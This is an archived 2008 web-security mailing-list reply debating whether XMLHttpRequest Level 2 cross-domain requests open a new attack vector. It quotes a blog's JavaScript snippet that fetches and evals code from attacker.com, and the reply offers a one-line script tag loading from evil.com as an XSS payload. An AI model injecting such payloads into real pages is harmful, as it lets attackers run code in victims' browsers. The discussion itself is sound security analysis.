RE: [WEB SECURITY] A reflection about XMLHttpRequest Level 2

["Hoffman, Billy" <billy.hoffman@xxxxxx>]

>From Blog:
--------
In my opinion, this feature allows an attacker to create within 10 lines of Javascript code a full MITM (Man In The Middle) attack.

var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.attacker.com/mitm";, true);
xhr.onreadystatechange = function(){
if ( xhr.readyState == 4 && xhr.status == 200)
eval(xhr.responseText)
};
xhr.send(null);

He can deploy this MITM simply by using a common XSS method.
----------

The vector you are describing makes no sense. An attacker injects 10 lines of JavaScript into a site, to contact a 3rd party web server, to pull down and execute JavaScript in the context of the original domain? The attacker already can execute script in the context of the original domain, BECAUSE HE CAN INJECT JAVASCRIPT!

So Yeah, I can do what you are describing above, and it only takes 1 line of HTML, and it also works on every browser from NetScape 2+ and IE 3+.

<script src=http://evil.com/Antons-xss-proxy/></script>

Billy

From: application.secure application.secure [mailto:application.secure@xxxxxxxxx]
Sent: Friday, February 29, 2008 2:21 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] A reflection about XMLHttpRequest Level 2

Hello to all,

I've read some stuff about the new feature available in the XMLHttpRequest Level 2 W3C first Draft : Cross-domain requests(supported by firefox 3).
I've tested this feature in FF3, I've wrote some lines about the subject.
See it @ http://applicationsecure.blogspot.com

Thanks for your feedback(questions on my blog), i don't understand how Web standard like W3C opens such security hole...


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]